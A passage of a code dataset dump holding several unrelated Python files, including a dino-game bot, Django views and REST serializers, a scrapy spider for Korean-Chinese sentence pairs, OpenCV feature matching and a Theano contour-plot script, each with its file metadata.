plain module global\r\n# is not shared between processes, so keep it in a multiprocessing.Value\r\nww = Value('d', 480.0)\r\n\r\n\r\ndef view_distance():\r\n    while time.time() - begin_time < 150:\r\n        with ww.get_lock():\r\n            ww.value += 0.375\r\n        time.sleep(0.071)\r\n        print(ww.value, \"view\")\r\n\r\n\r\ndef dino_action():\r\n    global fly\r\n    while True:\r\n        print(ww.value, \"act\")\r\n        vix = 0\r\n        screen = pyautogui.screenshot(region=(0, 565, 1500, 150))  # take a snapshot of the region\r\n        colour_1 = screen.getpixel((1, 132))\r\n        colour_2 = colour_1\r\n        first = 1\r\n        second = 0\r\n        for x in range(1, 1500):\r\n            lo_colour = screen.getpixel((x, 132))\r\n            if lo_colour == colour_1:\r\n                first += 1\r\n            else:\r\n                colour_2 = lo_colour\r\n                second += 1\r\n        if first > second:\r\n            current_colour = colour_1\r\n        else:\r\n            current_colour = colour_2\r\n\r\n        d = {5, 70, 110}\r\n        for x in range(239, math.ceil(ww.value)):\r\n            if vix == 1:\r\n                break\r\n            for y in d:\r\n                if current_colour == screen.getpixel((x, y)):\r\n                    vix = 1\r\n                    fly = 1\r\n                    pyautogui.keyDown('SPACE')\r\n                    time.sleep(0.2)\r\n        if fly == 1:\r\n            for x in range(60, 100):\r\n                if current_colour == screen.getpixel((x, 110)):\r\n                    break\r\n            pyautogui.keyDown('DOWN')\r\n            time.sleep(0.02)\r\n            pyautogui.keyUp('DOWN')\r\n            fly = 0\r\n\r\n\r\nif __name__ == '__main__':\r\n    proc = Process(target=view_distance, args=())\r\n    proc.start()\r\n    proc = Process(target=dino_action, args=())\r\n    proc.start()\r\n\r\n","sub_path":"src/dino_v3.2.py","file_name":"dino_v3.2.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616414625","text":"import csv\n\nlista_instancia = ['Aleatorio/aleatorio_pequeno_',\n                   'Aleatorio/aleatorio_medio_',\n                   'Aleatorio/aleatorio_grande_',\n                   'Aleatorio/aleatorio_gigante_',\n                   'Falkenauer_T/falkenauer_t60_',\n                   'Falkenauer_T/falkenauer_t120_',\n                   'Falkenauer_T/falkenauer_t249_',\n                   'Falkenauer_T/falkenauer_t501_',\n                   'Falkenauer_U/falkenauer_u120_',\n                   'Falkenauer_U/falkenauer_u250_',\n                   'Falkenauer_U/falkenauer_u500_',\n                   'Falkenauer_U/falkenauer_u1000_']\n\nlista_instancia_multiconflito = [10, 30, 50, 70]\n\n\narquivo = open(f'resultados/instancias_vazio.csv', 'w+')\narquivo_csv = csv.writer(arquivo)\narquivo_csv.writerow(['Instância', 'Com conflitos', 'Conflitos', 'Ordem', 'Executou', 'Anúncios', 'Quadros', 'Tamanho 
quadro', 'Espaço ocupado', 'Métrica', 'Tempo', 'Melhor iteração', 'Solução', 'Iterações'])\n\narquivo_csv.writerow([f'instancias/basico/', 'N', 0, 1])\narquivo_csv.writerow([f'instancias/basico/', 'S', 30, 1])\n\nfor j in range(11):\n arquivo_csv.writerow([f'instancias/Multiconflito/multiconflito_{lista_instancia_multiconflito[0]}/', 'N', 0, str(j + 1)])\n\nfor instancia in lista_instancia_multiconflito:\n for j in range(11):\n arquivo_csv.writerow([f'instancias/Multiconflito/multiconflito_{instancia}/', 'S', instancia, str(j + 1)])\n\nfor instancia in lista_instancia:\n for i in range(5):\n indice = str(i).zfill(2)\n for j in range(11):\n arquivo_csv.writerow([f'instancias/{instancia}{indice}/', 'N', 0, str(j + 1)])\n for j in range(11):\n arquivo_csv.writerow([f'instancias/{instancia}{indice}/', 'S', 30, str(j + 1)])\n\narquivo.close()\n","sub_path":"resultados/gera_planilha_instancias.py","file_name":"gera_planilha_instancias.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139110465","text":"import numpy as np\nimport cv2\n\nimg1 = cv2.imread('test_images/box.png') # queryImage\nimg2 = cv2.imread('test_images/box_in_scene.png') # trainImage\n\n# Initiate SIFT detector\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n# BFMatcher with default params\nbf = cv2.BFMatcher()\nmatches = bf.knnMatch(des1,des2, k=2)\n\n# Apply ratio test\ngood = []\nfor m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n# cv2.drawMatchesKnn expects list of lists as matches.\nimg3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,good,None,flags=2)\n\ncv2.imshow('image3', img3)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"openCV/feature_match/feature_book/exam_feature_match.py","file_name":"exam_feature_match.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594287063","text":"import torch\nfrom LogisticRegression import LogisticRegression\n\n\nbatch_size = 256\noutput_size = 2\nn_iter = 10000\nprint_freq = n_iter // 10\ncriterion = torch.nn.CrossEntropyLoss()\nlearning_rate = 0.005\nfeatures_not_to_use = [\"EmployeeCount\", \"Over18\", \"StandardHours\"]\n\n\ndef get_model(_device, _input_size):\n global model, optimizer, scheduler, input_size, device\n input_size = _input_size\n device = _device\n model = LogisticRegression(input_size, output_size).to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, n_iter // 3)\n","sub_path":"src/method_2/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435003842","text":"# This Python file uses the following encoding: utf-8\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom models import Book\n\n# Create your views here.\ndef search (request):\n error = False\n if 'input' in request.GET:\n answer = request.GET.get('input')\n if not answer:\n error = True\n elif len(answer) > 20:\n error = True\n else:\n books = Book.objects.filter(title__icontains = answer)\n return render_to_response('search_results.html', {'books': 
books, 'query':answer})\n    return render_to_response('search_form.html', {'error': error})\n","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219945607","text":"import mlrun\n\n\ndef prep_data(context, source_url: mlrun.DataItem, label_column=\"label\"):\n    # Convert the DataItem to a pandas DataFrame\n    df = source_url.as_df()\n    print(\"data url:\", source_url.url)\n    df[label_column] = df[label_column].astype(\"category\").cat.codes\n\n    # Record the DataFrame length after the run\n    context.log_result(\"num_rows\", df.shape[0])\n\n    # Store the data set in your artifacts database\n    context.log_dataset(\"cleaned_data\", df=df, index=False, format=\"csv\")\n","sub_path":"tests/system/projects/assets/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256410375","text":"from pathlib import Path\n\nfrom smarts.core.colors import Colors\nfrom smarts.sstudio import gen_scenario\nfrom smarts.sstudio import types as t\n\nscenario_id = \"ff239c9d-e4ff-4acc-bad5-bd55648c212e\"\nscenario_path = None\n\ntraffic_histories = [\n    t.TrafficHistoryDataset(\n        name=f\"argoverse_{scenario_id}\",\n        source_type=\"Argoverse\",\n        input_path=scenario_path,\n    )\n]\n\nduration = 11\nego_mission = [t.EndlessMission(begin=(\"road-202833190-202832889-202833142\", 2, \"max\"))]\n\nleader_id = \"history-vehicle-46408$\"\n# runtime = 11\ngen_scenario(\n    t.Scenario(\n        ego_missions=ego_mission,\n        map_spec=t.MapSpec(source=f\"{scenario_path}\", lanepoint_spacing=1.0),\n        traffic_histories=traffic_histories,\n        scenario_metadata=t.ScenarioMetadata(\n            actor_of_interest_re_filter=leader_id,\n            actor_of_interest_color=Colors.Blue,\n            scenario_difficulty=0.3,\n            scenario_duration=duration,\n        ),\n    ),\n    output_dir=Path(__file__).parent,\n)\n","sub_path":"scenarios/argoverse/vehicle_following/ff239c9d-e4ff-4acc-bad5-bd55648c212e_0_agents_1/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"540248198","text":"from rest_framework import serializers\nfrom .models import Employee,User,Training,Budget,Trainees,IndividualPoints,EmployeeEvaluation,Department,RolesResponsibilities,Schedule,EmploymentDetails,EmploymentHistory,UserLogs,AccountSettings\n\nclass EmployeeSerializers(serializers.ModelSerializer):\n    \n    class Meta:\n        model = Employee\n        fields = ('url',\n                  'id',\n                  'employeeID',\n                  'firstname',\n                  'middlename',\n                  'lastname',\n                  'address',\n                  'contact_number',\n                  'gender',\n                  'birthday',\n                  'age',\n                  'citizenship',\n                  'height',\n                  'weight',\n                  'blood_type',\n                  'status',\n                  'image'\n                  )\n\nclass UserSerializers(serializers.ModelSerializer):\n    employee_id = EmployeeSerializers(read_only=True)\n    employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n    class Meta:\n        model = User\n        fields = ('id','url','employee_id','employee','username','password','token','user_type')\n    \n\nclass TrainingSerializers(serializers.ModelSerializer):\n    class Meta:\n        model = Training\n        fields = ('id','url','training','date','time','timeDisplay','speaker','venue','address')\n\nclass BudgetSerializers(serializers.ModelSerializer):\n    training = TrainingSerializers(read_only=True)\n    training_id = 
serializers.PrimaryKeyRelatedField(queryset=Training.objects.all(), source='training', write_only=False)\n class Meta:\n model = Budget\n fields = ('id','url','training_id','training','reference_number','description','date','amount')\n \n\nclass TraineesSerializers(serializers.ModelSerializer):\n training = TrainingSerializers(read_only=True)\n training_id = serializers.PrimaryKeyRelatedField(queryset=Training.objects.all(), source='training', write_only=False)\n employee = EmployeeSerializers(read_only=True)\n employee_id = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee', write_only=False)\n\n class Meta:\n model = Trainees\n fields = ('id', 'url','training_id','training','employee_id', 'employee')\n \nclass IndividualPointsSerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n class Meta: \n model = IndividualPoints\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'date',\n 'paid',\n 'notpaid_billable',\n 'extra_workload',\n 'management',\n 'training',\n 'admin',\n 'investment',\n 'non_billable',\n 'sales',\n 'points',)\n \n \nclass EmployeeEvaluationSerializers(serializers.ModelSerializer):\n class Meta:\n model = EmployeeEvaluation\n fields = ('id','url','employee_id','date','description','certified_by','performance_rating')\n\nclass DepartmentSerializers(serializers.ModelSerializer):\n class Meta:\n model = Department\n fields = ('id','url','department_name','classification')\n\nclass RolesResponsibilitiesSerializers(serializers.ModelSerializer):\n class Meta:\n model = RolesResponsibilities\n fields = ('id','url','position','responsibilities')\n\nclass ScheduleSerializers(serializers.ModelSerializer):\n class Meta:\n model = Schedule\n fields = ('id','url','login','breakout','breakin','logout')\n\nclass EmploymentDetailsSerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n department_id = DepartmentSerializers(read_only=True)\n department = serializers.PrimaryKeyRelatedField(queryset=Department.objects.all(), source='department_id', write_only=False)\n roles_responsibilities_id = RolesResponsibilitiesSerializers(read_only=True)\n roles_responsibilities = serializers.PrimaryKeyRelatedField(queryset=RolesResponsibilities.objects.all(), source='roles_responsibilities_id', write_only=False)\n\n schedule_id = ScheduleSerializers(read_only=True)\n schedule = serializers.PrimaryKeyRelatedField(queryset=Schedule.objects.all(), source='schedule_id', write_only=False)\n class Meta:\n model = EmploymentDetails\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'department_id',\n 'department',\n 'date_employed',\n 'date_effective',\n 'roles_responsibilities_id',\n 'roles_responsibilities',\n 'quota',\n 'salary_base',\n 'basic_rate',\n 'incentive',\n 'challenge_quota',\n 'designation',\n 'assignment',\n 'employee_type',\n 'employment_status',\n 'resignation_date',\n 'end_of_contract',\n 'remarks_for_resignation_termination',\n 'flexi',\n 'schedule_id',\n 'schedule')\n\nclass EmploymentHistorySerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n department_id = 
DepartmentSerializers(read_only=True)\n department = serializers.PrimaryKeyRelatedField(queryset=Department.objects.all(), source='department_id', write_only=False)\n roles_responsibilities_id = RolesResponsibilitiesSerializers(read_only=True)\n roles_responsibilities = serializers.PrimaryKeyRelatedField(queryset=RolesResponsibilities.objects.all(), source='roles_responsibilities_id', write_only=False)\n \n schedule_id = ScheduleSerializers(read_only=True)\n schedule = serializers.PrimaryKeyRelatedField(queryset=Schedule.objects.all(), source='schedule_id', write_only=False)\n class Meta:\n model = EmploymentHistory\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'department_id',\n 'department',\n 'date_employed',\n 'date_effective',\n 'roles_responsibilities_id',\n 'roles_responsibilities',\n 'quota',\n 'salary_base',\n 'basic_rate',\n 'incentive',\n 'challenge_quota',\n 'designation',\n 'assignment',\n 'employee_type',\n 'employment_status',\n 'resignation_date',\n 'end_of_contract',\n 'remarks_for_resignation_termination',\n 'flexi',\n 'schedule_id',\n 'schedule',\n 'date_updated')\n\nclass UserLogsSerializers(serializers.ModelSerializer):\n user_id = UserSerializers(read_only=True)\n user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), source='user_id', write_only=False)\n class Meta:\n model = UserLogs\n fields = ('id','url','user_id','user','description','action','date')\n\nclass AccountSettingsSerializers(serializers.ModelSerializer):\n class Meta:\n model = AccountSettings\n fields = ('id',\n 'url',\n 'user_type',\n 'employeeProfile',\n 'individualPoints',\n 'trainingSeminar',\n 'positionResponsibilities',\n 'reports',\n 'adminSettings',\n 'departmentSettings',\n 'userSettings',\n 'userLogs'\n )\n ","sub_path":"tmra_backend/adminapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247771662","text":"# -*- coding: utf-8 -*-\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom ..items import hjItem\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\n\nimport sys\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\nclass lnSpider(CrawlSpider):\n name = \"learn\"\n allowed_domains = [\"kr.300168.com\"]\n start_urls = [\n\"http://kr.300168.com/news/list-16.html\",\n\"http://kr.300168.com/news/list-17.html\",\n\"http://kr.300168.com/news/list-5.html\",\n\"http://kr.300168.com/shangwu/list-19.html\"\n\n\n\n ]\n\n rules=(\n Rule(LinkExtractor(allow=('list-\\d+-\\d'),deny=('entertain')) ,\\\n callback='parse_url',follow=True),\n Rule(LinkExtractor(allow=('show'),deny=('enterdsadsa')) ,\\\n callback='parse_al'),\n\n\n )\n\n def parse_url(self, response):\n #print response.url\n pass\n def parse_al(self, response):\n url=response.url\n name=response.xpath(\"//h1[@class='title']/text()\").extract()[0]\n\n krs=response.xpath(\"//div[@class='langs_en']/text()\").extract()\n zhs=response.xpath(\"//div[@class='langs_cn']/text()\").extract()\n if len(krs) and len(krs)==len(zhs):\n\n pair_num=len(krs)\n content=[]\n for i in range(pair_num):\n pair={}\n pair[\"kr\"]=krs[i]\n pair[\"zh\"]=zhs[i]\n\n content.append(pair)\n else:\n krs=response.xpath(\"//div[@class='para original']/text()\").extract()\n zhs=response.xpath(\"//div[@class='para translate grey']/text()\").extract()\n if len(krs) and len(krs)==len(zhs):\n pair_num=len(krs)\n content=[]\n for i in 
range(pair_num):\n                    pair={}\n                    pair[\"kr\"]=krs[i]\n                    pair[\"zh\"]=zhs[i]\n\n                    content.append(pair)\n            else:\n                return\n        hj=hjItem()\n        hj[\"title\"]=name\n        hj[\"content\"]=content\n        hj[\"url\"]=url\n        return hj\n","sub_path":"hj/hj/spiders/ln.py","file_name":"ln.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587324419","text":"from django.shortcuts import get_object_or_404, render\nfrom .forms import AdForm , CommentForm\nfrom .models import Ad , Category , Comment\n# Create your views here.\n\n\n\n\ndef all_ads(request):\n    all_Ads = Ad.objects.all()\n    print(all_Ads)\n    return render(request,'ad/all-ads.html',{'ads':all_Ads})\n\n\n# class Adlist(ListView , CreateView):\n#     model = Ad\n#     template_name = 'ad/all-ads.html'\n\n\ndef single_ad(request,id):\n    ad = Ad.objects.get(id=id)\n    comments = Comment.objects.filter(ad=ad)\n\n\n    if request.method == 'POST': ## save\n        form = CommentForm(request.POST)\n        if form.is_valid():\n            myform = form.save(commit=False)\n            myform.author = request.user\n            myform.ad = ad\n            myform.save()\n    else:\n        form = CommentForm()\n\n    return render(request,'ad/single.html',{'ad':ad , 'comments' : comments , 'form':form})\n\n\ndef all_categories(request):\n    all_category = Category.objects.filter(main_category=None)\n    print(all_category)\n    return render(request,'ad/all-category.html',{'all_category':all_category})\n\n\ndef category_ads(request , id):\n    category = get_object_or_404(Category,id=id)\n    category_ads = Ad.objects.filter(category=category)\n\n    return render(request,'ad/category_ads.html',{'category_ads':category_ads})\n\n\n\ndef add_ad(request):\n    if request.method == 'POST': ## save\n        form = AdForm(request.POST , request.FILES)\n        if form.is_valid():\n            myform = form.save(commit=False)\n            myform.owner = request.user\n            myform.save()\n    else:\n        form = AdForm()\n\n    return render(request,'ad/post-ad.html',{'form':form})\n\n\n\ndef like_ad(request,id):\n    pass","sub_path":"ad/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602185428","text":"\"\"\"\nUsage:\n    visualize_contour.py [--load_filename=<load_filename>] [--save_filename=<save_filename>] [--dataset_i=<dataset_i>]\n    visualize_contour.py -h | --help\n\nOptions:\n    -h --help    Show this screen.\n    --load_filename=<load_filename>    [default: VAT_1.pkl]\n    --save_filename=<save_filename>    [default: VAT_1.pdf]\n    --dataset_i=<dataset_i>    [default: 1]\n\"\"\"\n\nimport sys\nfrom docopt import docopt\n\nimport theano\nimport numpy\nfrom numpy import linalg\nfrom matplotlib.patches import Circle, Arc\nimport matplotlib.pyplot as plt\n\nfrom six.moves import cPickle as pickle\n\nfrom theano import tensor as T\nfrom source.costs import LDS_finite_diff\n\nimport os\nimport errno\n\n\ndef make_sure_path_exists(path):\n    try:\n        os.makedirs(path)\n    except OSError as exception:\n        if exception.errno != errno.EEXIST:\n            raise\n\n\ndef visualize_contour_for_synthetic_dataset(model, d_i, x_data, y_data, basis, with_lds=False, epsilon=0.5, power_iter=5, save_filename='prob_cont'):\n    linewidth = 10\n\n    range_x = numpy.arange(-2.0, 2.1, 0.05)\n    A_inv = linalg.inv(numpy.dot(basis, basis.T))\n    train_x_org = numpy.dot(x_data, numpy.dot(basis.T, A_inv))\n    test_x_org = numpy.zeros((range_x.shape[0] ** 2, 2))\n    train_x_1_ind = numpy.where(y_data == 1)[0]\n    train_x_0_ind = numpy.where(y_data == 0)[0]\n\n    for i in range(range_x.shape[0]):\n        for j in range(range_x.shape[0]):\n            test_x_org[range_x.shape[0] * i + j, 
0] = range_x[i]\n test_x_org[range_x.shape[0] * i + j, 1] = range_x[j]\n\n test_x = numpy.dot(test_x_org, basis)\n x = T.matrix()\n f_p_y_given_x = theano.function(inputs=[x], outputs=model.forward_test(x))\n pred = f_p_y_given_x(numpy.asarray(test_x, 'float32'))[:, 1]\n\n Z = numpy.zeros((range_x.shape[0], range_x.shape[0]))\n for i in range(range_x.shape[0]):\n for j in range(range_x.shape[0]):\n Z[i, j] = pred[range_x.shape[0] * i + j]\n\n Y, X = numpy.meshgrid(range_x, range_x)\n\n fontsize = 20\n rc = 'r'\n bc = 'b'\n\n if d_i == 1:\n rescale = 1.0 # /numpy.sqrt(500)\n arc1 = Arc(xy=[0.5 * rescale, -0.25 * rescale], width=2.0 * rescale, height=2.0 * rescale, angle=0, theta1=270,\n theta2=180, linewidth=linewidth, alpha=0.15, color=rc)\n arc2 = Arc(xy=[-0.5 * rescale, +0.25 * rescale], width=2.0 * rescale, height=2.0 * rescale, angle=0, theta1=90,\n theta2=360, linewidth=linewidth, alpha=0.15, color=bc)\n fig = plt.gcf()\n fig.gca().add_artist(arc1)\n fig.gca().add_artist(arc2)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n else:\n rescale = 1.0 # /numpy.sqrt(500)\n circle1 = Circle((0, 0), 1.0 * rescale, color=rc, alpha=0.2, fill=False, linewidth=linewidth)\n circle2 = Circle((0, 0), 0.15 * rescale, color=bc, alpha=0.2, fill=False, linewidth=linewidth)\n fig = plt.gcf()\n fig.gca().add_artist(circle1)\n fig.gca().add_artist(circle2)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n\n levels = [0.05, 0.2, 0.35, 0.5, 0.65, 0.8, 0.95]\n cs = plt.contour(X * rescale, Y * rescale, Z, 7, cmap='bwr', vmin=0., vmax=1.0, linewidths=8., levels=levels)\n cbar = plt.colorbar(cs)\n cbar.ax.tick_params(labelsize=fontsize)\n plt.setp(cs.collections, linewidth=1.0)\n plt.contour(X * rescale, Y * rescale, Z, 1, cmap='binary', vmin=0, vmax=0.5, linewidths=2.0)\n\n plt.xlim([-2. * rescale, 2. * rescale])\n plt.ylim([-2. * rescale, 2. 
* rescale])\n    plt.xticks([-2.0, -1.0, 0, 1, 2.0], fontsize=fontsize)\n    plt.yticks([-2.0, -1.0, 0, 1, 2.0], fontsize=fontsize)\n\n    plt.scatter(train_x_org[train_x_1_ind, 0] * rescale, train_x_org[train_x_1_ind, 1] * rescale, s=10, marker='o',\n                c=rc, label='$y=1$')\n    plt.scatter(train_x_org[train_x_0_ind, 0] * rescale, train_x_org[train_x_0_ind, 1] * rescale, s=10, marker='*',\n                c=bc, label='$y=0$')\n\n    lds_part = \"\"\n    if with_lds:\n        x = T.matrix()\n        f_LDS = theano.function(inputs=[],\n                                outputs=LDS_finite_diff(x=x,\n                                                        forward_func=model.forward_test,\n                                                        main_obj_type='CE',\n                                                        epsilon=epsilon,\n                                                        norm_constraint='L2',\n                                                        num_power_iter=power_iter),\n                                givens={x: x_data})\n        ave_LDS = numpy.mean([f_LDS().mean() for i in range(50)])\n        print(ave_LDS)\n        lds_part = '\\nAverage $\\widetilde{\\\\rm LDS}=%.3f$' % ave_LDS\n    plt.title('%s Valid Error %g%s' % (args[\"--load_filename\"].split(\"_\")[0], err_rate, lds_part))\n    make_sure_path_exists(\"./figure\")\n    # plt.show()\n    plt.savefig('figure/' + save_filename)\n    plt.close()\n\n\nif __name__ == '__main__':\n    args = docopt(__doc__)\n    dataset_i = int(args['--dataset_i'])\n\n    with open('dataset/syndata_' + str(dataset_i) + '.pkl', \"rb\") as f:\n        if sys.version_info.major == 3:\n            dataset = pickle.load(f, encoding='bytes')\n        else:\n            dataset = pickle.load(f)\n\n    x_train = numpy.asarray(dataset[0][0][0], dtype=theano.config.floatX)\n    t_train = numpy.asarray(dataset[0][0][1], dtype='int32')\n    x_valid = numpy.asarray(dataset[0][1][0], dtype=theano.config.floatX)\n    t_valid = numpy.asarray(dataset[0][1][1], dtype='int32')\n\n    with open('trained_model/' + args['--load_filename'], \"rb\") as f2:\n        if sys.version_info.major == 3:\n            temps = pickle.load(f2, encoding='bytes')\n            model = temps[0]\n        else:\n            model = pickle.load(f2)[0]\n\n    x = T.matrix()\n    f_p_y = theano.function(inputs=[x], outputs=model.forward(x))\n    pred = f_p_y(numpy.asarray(x_valid, 'float32'))\n    acc = 1.0 * numpy.sum(pred.argmax(1) == t_valid) / pred.shape[0]\n    err_rate = 1 - acc\n    print(\"acc %g error rate %g\" % (acc, err_rate))\n\n    visualize_contour_for_synthetic_dataset(model, dataset_i, x_valid, t_valid, dataset[1], with_lds=True, save_filename=\"test-\"+args['--save_filename'])\n    visualize_contour_for_synthetic_dataset(model, dataset_i, x_train, t_train, dataset[1], with_lds=True, save_filename=args['--save_filename'])\n","sub_path":"visualize_contour.py","file_name":"visualize_contour.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604612222","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.forms import formset_factory\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom constructors.form import SchemeForm, EquipmentListForm, EquipmentConstructorSingleForm, AddEquipmentForm, \\\n    EquipmentSingleWithCtnForm, SchemeSingleForm, EquipmentListWithoutSWForm, EquipmentConstructorForm\nfrom nop.models import Area\nfrom plan.forms import LoginForm, subdict\nfrom plan.models import InfoText\nfrom .models import StockStruct, Equipment, Scheme\n\n\n# main page of the constructors department\ndef index(request):\n    c = {\n        'area_id': Area.objects.first().pk,\n        'login_form': LoginForm(),\n        'it': InfoText.objects.get(pageName=\"constructor_index\"),\n        'pageTitleHeader': 'Конструкторам',\n    }\n    return render(request, \"constructors/index.html\", c)\n\n\n# stock balance\ndef stockBalance(request, area_id):\n    if request.method == 
\"POST\":\n        # build the form from the request\n        form = EquipmentListForm(request.POST, prefix='main_form')\n        # if the form was filled in correctly\n        if form.is_valid():\n            # fetch the area object\n            area = Area.objects.get(pk=area_id)\n            # build the list of equipment that has data for this area\n            lst = []\n            for e in form.cleaned_data['equipment']:\n                try:\n                    eq = Equipment.objects.get(pk=e)\n                    flg = True\n                    for ss in eq.stockStruct.all():\n                        if ss.area == area:\n                            lst.append([eq, ss.cnt])\n                            flg = False\n                    if flg:\n                        messages.error(request, \"На этой площадке не найдено складской структуры \" + eq.name)\n                except:\n                    messages.error(request, \"Оборудования с таким id не найдено\")\n            # if the list is not empty\n            if len(lst) > 0:\n                # render the page with the list\n                c = {\n                    'login_form': LoginForm(),\n                    'lst': lst,\n                    'area_id': int(area_id),\n                    'pageTitleHeader': 'Конструкторам',\n                }\n                return render(request, \"constructors/stockList.html\", c)\n\n    c = {\n        'area_id': int(area_id),  # otherwise it cannot be compared with the area id while iterating\n        'areas': Area.objects.all().order_by('name'),\n        'curPageLink': \"/constructors/stock_balance/\",\n        'login_form': LoginForm(),\n        'chooseForm': EquipmentListWithoutSWForm(prefix=\"main_form\"),\n        'pageTitleHeader': 'Конструкторам',\n        'chooseHeader': 'Выберите оборудование, баланс которого на складе надо отобразить',\n    }\n    return render(request, \"constructors/stockBalance.html\", c)\n\n\n# design work page\ndef tehnology(request):\n    if request.method == \"POST\":\n        # equipment editing form\n        eq_form = EquipmentConstructorSingleForm(request.POST, prefix='eq_form')\n        # if the form was filled in correctly\n        if eq_form.is_valid():\n            eq = Equipment.objects.get(pk=int(eq_form.cleaned_data['equipment']))\n            return HttpResponseRedirect('/constructors/detail/' + str(eq.pk) + '/')\n    c = {\n        'login_form': LoginForm(),\n        'chooseForm': EquipmentConstructorSingleForm(prefix=\"eq_form\"),\n        'creationForm': AddEquipmentForm(prefix=\"main_form\"),\n        'area_id': Area.objects.first().pk,\n        'pageTitleHeader': 'Конструкторам',\n        'chooseHeader': 'Выберите оборудование, которое Вы хотите поменять',\n        'creationUrl': '/constructors/addEquipment/'\n    }\n    return render(request, \"constructors/tehnology.html\", c)\n\n\n# add equipment\ndef addEquipment(request):\n    if request.method == \"POST\":\n        # equipment creation form\n        form = AddEquipmentForm(request.POST, prefix='main_form')\n        # if the form was filled in correctly\n        if form.is_valid():\n            d = {}\n            d[\"name\"] = form.cleaned_data[\"name\"]\n            d[\"equipmentType\"] = form.cleaned_data[\"tp\"]\n            eq = Equipment.objects.create()\n\n            if int(form.cleaned_data[\"tp\"]) == Equipment.TYPE_STANDART_WORK:\n                d[\"dimension\"] = \"час\"\n                d[\"duration\"] = 1\n            else:\n                d[\"dimension\"] = \"шт.\"\n\n            for area in Area.objects.all():\n                s = StockStruct.objects.create(area=area)\n                eq.stockStruct.add(s)\n            eq.save()\n            Equipment.objects.filter(pk=eq.pk).update(**d)\n            return HttpResponseRedirect('/constructors/detail/' + str(eq.pk) + '/')\n    return HttpResponseRedirect('/constructors/work/')\n\n\n# equipment details\ndef detailEquipment(request, eq_id):\n    EquipmentFormset = formset_factory(EquipmentSingleWithCtnForm)\n\n    eq = Equipment.objects.get(pk=eq_id)\n\n    if request.method == 'POST':\n        # build the form from the request\n        form = EquipmentConstructorForm(request.POST, prefix='main_form')\n        # if the form was filled in correctly\n        if form.is_valid():\n            d = subdict(form, (\"name\", \"needVIK\", \"equipmentType\"))\n            
